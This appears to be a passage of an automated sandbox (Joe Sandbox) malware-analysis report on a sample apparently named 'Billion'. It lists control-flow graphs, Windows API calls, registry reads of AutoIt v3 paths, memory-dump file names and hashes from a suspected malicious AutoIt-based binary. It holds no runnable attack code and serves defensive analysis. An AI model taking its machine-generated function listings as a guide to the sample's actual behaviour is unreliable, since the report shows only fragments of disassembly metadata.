                                                                                                                                                                                                                                                                                                          control_flow_graph 237 14ac3e-14b063 call 138ec0 call 14bc58 call 13e6a0 244 188584-188591 237->244 245 14b069-14b073 237->245 248 188593 244->248 249 188596-1885a5 244->249 246 18896b-188979 245->246 247 14b079-14b07e 245->247 254 18897b 246->254 255 18897e 246->255 250 14b084-14b090 call 14b5b6 247->250 251 1885b2-1885b4 247->251 248->249 252 1885aa 249->252 253 1885a7 249->253 259 1885bd 250->259 262 14b096-14b0a3 call 13c98d 250->262 251->259 252->251 253->252 254->255 257 188985-18898e 255->257 260 188990 257->260 261 188993 257->261 265 1885c7 259->265 260->261 263 18899c-1889eb call 13e6a0 call 14bbbe * 2 261->263 270 14b0ab-14b0b4 262->270 299 14b1e0-14b1f5 263->299 300 1889f1-188a03 call 14b5b6 263->300 268 1885cf-1885d2 265->268 271 1885d8-188600 call 154cd3 call 137ad5 268->271 272 14b158-14b16f 268->272 274 14b0b8-14b0d6 call 154d98 270->274 311 18862d-188651 call 137b1a call 13bd98 271->311 312 188602-188606 271->312 277 14b175 272->277 278 188954-188957 272->278 293 14b0e5 274->293 294 14b0d8-14b0e1 274->294 282 1888ff-188920 call 13e6a0 277->282 283 14b17b-14b17e 277->283 284 18895d-188960 278->284 285 188a41-188a79 call 13e6a0 call 14bbbe 278->285 282->299 316 188926-188938 call 14b5b6 282->316 290 14b184-14b187 283->290 291 188729-188743 call 14bbbe 283->291 284->263 292 188962-188965 284->292 285->299 343 188a7f-188a91 call 14b5b6 285->343 301 1886ca-1886e0 call 136c03 290->301 302 14b18d-14b190 290->302 321 188749-18874c 291->321 322 18888f-1888b5 call 13e6a0 291->322 292->246 292->299 293->265 305 14b0eb-14b0fc 293->305 294->274 303 14b0e3 294->303 306 188ac9-188acf 299->306 307 14b1fb-14b20b call 13e6a0 299->307 334 188a2f-188a3c call 13c98d 300->334 335 188a05-188a0d 300->335 301->299 332 1886e6-1886fc call 14b5b6 301->332 314 14b196-14b1b8 call 13e6a0 302->314 315 188656-188659 302->315 303->305 305->246 317 14b102-14b11c 305->317 306->270 324 188ad5 306->324 311->315 312->311 326 188608-18862b call 13ad40 312->326 314->299 351 14b1ba-14b1cc call 14b5b6 314->351 315->246 319 18865f-188674 call 136c03 315->319 354 18893a-188943 call 13c98d 316->354 355 188945 316->355 317->268 318 14b122-14b154 call 14bbbe call 13e6a0 317->318 318->272 319->299 373 18867a-188690 call 14b5b6 319->373 341 18874e-188751 321->341 342 1887bf-1887de call 13e6a0 321->342 322->299 376 1888bb-1888cd call 14b5b6 322->376 324->246 326->311 326->312 379 18870d-188716 call 138ec0 332->379 380 1886fe-18870b call 138ec0 332->380 386 188ac2-188ac4 334->386 349 188a1e-188a29 call 13b4b1 335->349 350 188a0f-188a13 335->350 357 188ada-188ae8 341->357 358 188757-188774 call 13e6a0 341->358 342->299 378 1887e4-1887f6 call 14b5b6 342->378 390 188a93-188a9b 343->390 391 188ab5-188abe call 13c98d 343->391 349->334 397 188b0b-188b19 349->397 350->349 366 188a15-188a19 350->366 398 1886ba-1886c3 call 13c98d 351->398 399 14b1d2-14b1de 351->399 372 188949-18894f 354->372 355->372 364 188aea 357->364 365 188aed-188afd 357->365 358->299 401 18877a-18878c call 14b5b6 358->401 364->365 381 188aff 365->381 382 188b02-188b06 365->382 383 188aa1-188aa3 366->383 372->299 414 18869d-1886ab call 138ec0 373->414 415 188692-18869b call 13c98d 373->415 406 1888de 376->406 407 1888cf-1888dc call 13c98d 376->407 378->299 422 1887fc-188805 call 14b5b6 378->422 423 188719-188724 call 138577 379->423 380->423 381->382 382->307 383->299 386->299 402 188aa8-188ab3 call 13b4b1 390->402 403 188a9d 390->403 391->386 411 188b1b 397->411 412 188b1e-188b21 397->412 398->301 399->299 434 18878e-18879d call 13c98d 401->434 435 18879f 401->435 402->391 402->397 403->383 421 1888e2-1888e9 406->421 407->421 411->412 412->257 441 1886ae-1886b5 414->441 415->441 428 1888eb-1888f0 call 13396b 421->428 429 1888f5 call 133907 421->429 446 188818 422->446 447 188807-188816 call 13c98d 422->447 423->299 428->299 445 1888fa 429->445 436 1887a3-1887ae call 159334 434->436 435->436 436->246 452 1887b4-1887ba 436->452 441->299 445->299 451 18881c-18883f 446->451 447->451 454 18884d-188850 451->454 455 188841-188848 451->455 452->299 456 188860-188863 454->456 457 188852-18885b 454->457 455->454 458 188873-188876 456->458 459 188865-18886e 456->459 457->456 458->299 460 18887c-18888a 458->460 459->458 460->299
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: `* $d0b$d10m0$d1b$d1r0,2$d5m0$e# $i$( $( $( $(
                                                                                                                                                                                                                                                                                                          • API String ID: 0-774687368
                                                                                                                                                                                                                                                                                                          • Opcode ID: 67b19a5c49f2436713bfc7386d052560386f3f16ccbf504aac867d7491cb95f5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 39f1a729e6135898b186ae748c906d74a79247754ef282392c8d0c9cd3cbab6c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67b19a5c49f2436713bfc7386d052560386f3f16ccbf504aac867d7491cb95f5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16624A70508341CFC728DF24D195AAABBE1FF98304F50896EE4999B361DB71DA49CF82
                                                                                                                                                                                                                                                                                                          Function 0013370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 592 13370f-133724 593 133726-133729 592->593 594 133784-133786 592->594 595 13372b-133732 593->595 596 13378a 593->596 594->593 597 133788 594->597 598 133804-13380c PostQuitMessage 595->598 599 133738-13373d 595->599 601 173df4-173e1c call 132f92 call 14f23c 596->601 602 133790-133795 596->602 600 13376f-133777 DefWindowProcW 597->600 607 1337b8-1337ba 598->607 603 133743-133747 599->603 604 173e61-173e75 call 19c8f7 599->604 606 13377d-133783 600->606 638 173e21-173e28 601->638 608 133797-13379a 602->608 609 1337bc-1337e3 SetTimer RegisterWindowMessageW 602->609 610 13380e-133818 call 14fcad 603->610 611 13374d-133752 603->611 604->607 629 173e7b 604->629 607->606 615 173d95-173d98 608->615 616 1337a0-1337b3 KillTimer call 133907 call 1359ff 608->616 609->607 612 1337e5-1337f0 CreatePopupMenu 609->612 631 13381d 610->631 618 173e46-173e4d 611->618 619 133758-13375d 611->619 612->607 623 173dd0-173def MoveWindow 615->623 624 173d9a-173d9e 615->624 616->607 618->600 626 173e53-173e5c call 191423 618->626 627 133763-133769 619->627 628 1337f2-133802 call 13381f 619->628 623->607 632 173da0-173da3 624->632 633 173dbf-173dcb SetFocus 624->633 626->600 627->600 627->638 628->607 629->600 631->607 632->627 634 173da9-173dba call 132f92 632->634 633->607 634->607 638->600 642 173e2e-173e41 call 133907 call 13396b 638->642 642->600
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00133709,?,?), ref: 00133777
                                                                                                                                                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00133709,?,?), ref: 001337A3
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001337C6
                                                                                                                                                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00133709,?,?), ref: 001337D1
                                                                                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 001337E5
                                                                                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00133806
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                          • String ID: 0$ $0$ $TaskbarCreated
                                                                                                                                                                                                                                                                                                          • API String ID: 129472671-3218616665
                                                                                                                                                                                                                                                                                                          • Opcode ID: 413dce09280cef11d40a2ea83cbe6b9a8f32d5780a08d5387c3c001f9781ff35
                                                                                                                                                                                                                                                                                                          • Instruction ID: e37b5c650d3a8f7d5b926c78bad9853770b232cba9f37874adbae934e7063458
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 413dce09280cef11d40a2ea83cbe6b9a8f32d5780a08d5387c3c001f9781ff35
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0141F6F1210344FBDB182B7CEC4DB793A69E714315F10422AF626861A2CB74DB49A769
                                                                                                                                                                                                                                                                                                          Function 00133624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00133657
                                                                                                                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00133681
                                                                                                                                                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00133692
                                                                                                                                                                                                                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 001336AF
                                                                                                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001336BF
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A9), ref: 001336D5
                                                                                                                                                                                                                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001336E4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                                          • Opcode ID: fe991fc6feeda2f89993d78c091d44d717d7d00c74a4fb824638ab3d9548988b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1178fc868716b2561a8c97f474cb9697490a3189d81a49ecfd32f76bd171a5b7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe991fc6feeda2f89993d78c091d44d717d7d00c74a4fb824638ab3d9548988b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C21BFB5901318EFDB009FA8FD8DB9DBBB4FB08714F10412AF615A62A0D7B585888F95
                                                                                                                                                                                                                                                                                                          Function 001709DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 649 1709db-170a0b call 1707af 652 170a26-170a32 call 165594 649->652 653 170a0d-170a18 call 15f636 649->653 659 170a34-170a49 call 15f636 call 15f649 652->659 660 170a4b-170a94 call 17071a 652->660 658 170a1a-170a21 call 15f649 653->658 670 170cfd-170d03 658->670 659->658 668 170a96-170a9f 660->668 669 170b01-170b0a GetFileType 660->669 672 170ad6-170afc GetLastError call 15f613 668->672 673 170aa1-170aa5 668->673 674 170b53-170b56 669->674 675 170b0c-170b3d GetLastError call 15f613 CloseHandle 669->675 672->658 673->672 679 170aa7-170ad4 call 17071a 673->679 677 170b5f-170b65 674->677 678 170b58-170b5d 674->678 675->658 686 170b43-170b4e call 15f649 675->686 682 170b69-170bb7 call 1654dd 677->682 683 170b67 677->683 678->682 679->669 679->672 692 170bc7-170beb call 1704cd 682->692 693 170bb9-170bc5 call 17092b 682->693 683->682 686->658 698 170bfe-170c41 692->698 699 170bed 692->699 693->692 700 170bef-170bf9 call 168a2e 693->700 702 170c43-170c47 698->702 703 170c62-170c70 698->703 699->700 700->670 702->703 705 170c49-170c5d 702->705 706 170c76-170c7a 703->706 707 170cfb 703->707 705->703 706->707 708 170c7c-170caf CloseHandle call 17071a 706->708 707->670 711 170ce3-170cf7 708->711 712 170cb1-170cdd GetLastError call 15f613 call 1656a6 708->712 711->707 712->711
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0017071A: CreateFileW.KERNEL32(00000000,00000000,?,00170A84,?,?,00000000,?,00170A84,00000000,0000000C), ref: 00170737
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00170AEF
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00170AF6
                                                                                                                                                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 00170B02
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00170B0C
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00170B15
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00170B35
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00170C7F
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00170CB1
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00170CB8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1ba3ba8aa27a42a5484769928a7c8d7c7f55345deeb573aa670ad20327518ee5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8253f9124bdcb3aa7623b1dec01e1b1d1b52eb74516aa77e5351517d5c99d69f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ba3ba8aa27a42a5484769928a7c8d7c7f55345deeb573aa670ad20327518ee5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CA12432A04349CFDF1AAF68D856BAE3BB1AB0A324F14415DF819DB2D1DB319D12CB51
                                                                                                                                                                                                                                                                                                          Function 001352A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00135594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00174B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 001355B2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00135238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0013525A
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001353C4
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00174BFD
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00174C3E
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00174C80
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00174CE7
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00174CF6
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                                          • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1166705f66893b284e880590e21e6dcf93fcca26385ed2aeefe9b5ae33b4739e
                                                                                                                                                                                                                                                                                                          • Instruction ID: d1e5fccef047bd01292a904901526435cbaffd2f125d2541187692940c7e33b8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1166705f66893b284e880590e21e6dcf93fcca26385ed2aeefe9b5ae33b4739e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68718971504300AFC304EF69E88599ABBECFFA8740F80442EF545971A2EB719A48CB92
                                                                                                                                                                                                                                                                                                          Function 001334D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 001334DE
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 001334ED
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00133503
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A4), ref: 00133515
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A2), ref: 00133527
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0013353F
                                                                                                                                                                                                                                                                                                          • RegisterClassExW.USER32(?), ref: 00133590
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: GetSysColorBrush.USER32(0000000F), ref: 00133657
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: RegisterClassExW.USER32(00000030), ref: 00133681
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00133692
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: InitCommonControlsEx.COMCTL32(?), ref: 001336AF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001336BF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: LoadIconW.USER32(000000A9), ref: 001336D5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001336E4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                          • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                                          • Opcode ID: e0d5ad30104203b7864c7c86aa98062d0d6997b867b9eb9b7cdba82aea16ccb6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 90545d9f10a725a5b1c7686f917d8c4f31770f1f5701f31cd6bce75e84d868d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0d5ad30104203b7864c7c86aa98062d0d6997b867b9eb9b7cdba82aea16ccb6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66211D70D00354EBDB109FA5FC5DA99BFB8FB48B54F00406BE604A62A1D7B945898F94
                                                                                                                                                                                                                                                                                                          Function 0013F6D0 Relevance: 17.2, APIs: 2, Strings: 7, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: Variable must be of type 'Object'.$t5 $t5 $t5 $t5 $t5 t5 $`
                                                                                                                                                                                                                                                                                                          • API String ID: 0-2097392079
                                                                                                                                                                                                                                                                                                          • Opcode ID: b747929d7794ac13fa22440387ced8906929a632cbd0166decb206aaa140ffa1
                                                                                                                                                                                                                                                                                                          • Instruction ID: ba9cd3fb99d8d9ea95437d3225e55c3bdaeb6c7b8638239dc85e56bee3faf1b3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b747929d7794ac13fa22440387ced8906929a632cbd0166decb206aaa140ffa1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83C28771E00605DFCB24DF98C880BADB7B1FF19310F25816AE915AB2A1D775EE42CB91
                                                                                                                                                                                                                                                                                                          Function 00140340 Relevance: 17.0, APIs: 3, Strings: 6, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 001415F2
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
